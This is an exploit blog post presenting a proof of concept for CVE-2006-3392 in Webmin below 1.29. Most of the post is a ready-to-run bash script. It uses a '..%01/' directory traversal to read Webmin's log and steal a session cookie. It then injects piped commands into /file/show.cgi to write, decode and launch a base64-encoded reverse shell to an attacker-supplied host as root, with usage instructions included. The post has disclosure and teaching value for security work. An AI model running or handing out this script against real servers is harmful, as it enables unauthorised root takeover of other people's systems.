avatar
oxasploits
one zero day at a time
  • HOME
  • ABOUT
  • SPONSORS
  • SERVICES
  • HOSTING
  • CATEGORIES
  • PROJECTS
  • EXPLOITS
  • UPTIME
  • GITHUB
  • PRIVACY
  • PREVIOUS ENEAVORS
  • ARCHIVES
Home CVE-2006-3392 Webmin <1.29 pivot RCE Whitepaper
Post

CVE-2006-3392 Webmin <1.29 pivot RCE Whitepaper

By Marshall Whittaker
Posted Mar 18, 2021 2 min read
exploit perl webmin multistage vulnerabilities PoC code-injection RCE bugs CVE-2006-3392

Background

Webmin contains two critical vulnerabilities within the perl codebase. The first, a directory traversal where you can read arbitrary files, including webmin’s logs. The second vulnerability consists of an authenticated only open read perl exec code exececution bug as root. To wrap it all together we can are able to read Webmin’s log file, which contains a cookie, (I personally thought this part was clever), to go from an unauthenticated webmin, to session hijack the last used login to webmin, thus using this as leverage to attack the /file/show.cgi application and run arbitrary code as root.

If you would like me to dev an exploit for specific software, you can inquire on my services page

PoC

First we simply grab the session cookie out of webmin’s logfile with the directory transversal ex:

/var/webmin/webmin.log

Note: You’ll need to use hex character %01 to subvert the directory transversal filtering. ex:

..%01/..%01/

Next we’ll use the hijacked session to open read on show.cgi with the | character. This is a nuance of how when opening a file for reading in perl, you can use the pipe to receive the return of a command instead of an opened file.

Exploitation

#   __ _  _  __   ___  __  ____ ____
#  /  ( \/ )/ _\ / __)/ _\/ ___(_  _)
# (  O )  (/    ( (_ /    \___ \ )(
#  \__(_/\_\_/\_/\___\_/\_(____/(__)
#


HOST=$1;
PORT=$2;
LHOST=$3;
LPORT=$4;
if [ $# -lt 4 ]
  then
echo "Webmin <1.29 remote root exploit by oxagast"
echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE.";
echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!";
echo "Usage:"
echo "  nc -l -p 7777"
echo "  $0 10.0.0.4 10000 10.0.0.3 7777"
else
CMD=`echo "bash -p -i >& /dev/tcp/$LHOST/$LPORT 0>&1" | base64`
echo $CMD;
CMD0="echo $CMD > /tmp/b64s"
CMD1='base64 -d /tmp/b64s > /tmp/she11';
CMD2='chmod a+x /tmp/she11';
CMD3='/bin/bash /tmp/she11';
echo "Webmin <1.29 remote root exploit by oxagast"
echo "Server: $HOST:$PORT";
echo "Getting cookie from webmin log...";
SID=`curl $HOST:$PORT/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/var/webmin/webmin.log -s | tail -n 1 | cut -f 5 -d ' ' | tr -d '\n'`;
echo "Setting cookie to: sid=$SID";
echo "Copying base64 encoded shell..."
curl --header "Host: $HOST:$PORT" --header 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' --header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' --header 'Accept-Language: en-US,en;q=0.5' --header "Cookie: testing=1; sid=$SID" --header 'Connection: keep-alive' --header 'Upgrade-Insecure-Requests: 1' "$HOST:$PORT/file/show.cgi/bin/AAAF0|$CMD0|" -s -L
sleep 1
echo "Debase64ing shell...";
curl --header "Host: $HOST:$PORT" --header 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' --header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' --header 'Accept-Language: en-US,en;q=0.5' --header "Cookie: testing=1; sid=$SID" --header 'Connection: keep-alive' --header 'Upgrade-Insecure-Requests: 1' "$HOST:$PORT/file/show.cgi/bin/AAAF1|$CMD1|" -s -L
sleep 1
echo "Chmodding shell...";
curl --header "Host: $HOST:$PORT" --header 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' --header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' --header 'Accept-Language: en-US,en;q=0.5' --header "Cookie: testing=1; sid=$SID" --header 'Connection: keep-alive' --header 'Upgrade-Insecure-Requests: 1' "$HOST:$PORT/file/show.cgi/bin/AAAF2|$CMD2|" -s -L
sleep 1
echo "Trying to spawn...";
curl --header "Host: $HOST:$PORT" --header 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' --header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' --header 'Accept-Language: en-US,en;q=0.5' --header "Cookie: testing=1; sid=$SID" --header 'Connection: keep-alive' --header 'Upgrade-Insecure-Requests: 1' "$HOST:$PORT/file/show.cgi/bin/AAAF3|$CMD3|" -s -L
fi

Good game guys, thanks for playing!

If you enjoy my work, sponsor or hire me! I work hard keeping oxasploits running!
Bitcoin Address:
bc1qq7vvwfe7760s3dm8uq28seck465h3tqp3fjq4l

Thank you so much and happy hacking!
exploits
This post is licensed under CC BY 4.0 by the author.
Share
Recently Updated
  • Peripheral network reconnaissance OSINT
Trending Tags
exploit vulnerabilities PoC 0day code-injection config perl RCE walkthrough bitcoin


  

Further Reading

Mar 22, 2021

CVE-2017-5816 HP iMC PLAT RCE Whitepaper

Background The dbman.exe module out of HP iMC PLAT 7.3 listening on TCP/2810 tries to initiate a restart of some network services, whilst doing so running NET STOP on an asn.1 BER encoded ip addr...

May 6, 2021

Web app exploitation techniques

Background This is intended to be a concise cheat sheet for common web application exploitation techniques. Most of these techniques are well known, but hopefully, this can serve as a place to b...

Nov 17, 2021

Bash wildcard expansion globbing abuse

Background A lot of my research into bugs goes unfounded, and very seldom do I find a bug by actually looking for it, so much as it was just a typo or something. So when I realized that the wildc...

-

CVE-2017-5816 HP iMC PLAT RCE Whitepaper

© 2025 Marshall Whittaker. Some rights reserved.

| Home | Services | Hosting | About
| GitHub | Projects | Exploits | Services | Sponsors | Privacy|
| Endeavors | Status | Franklin | SPaste |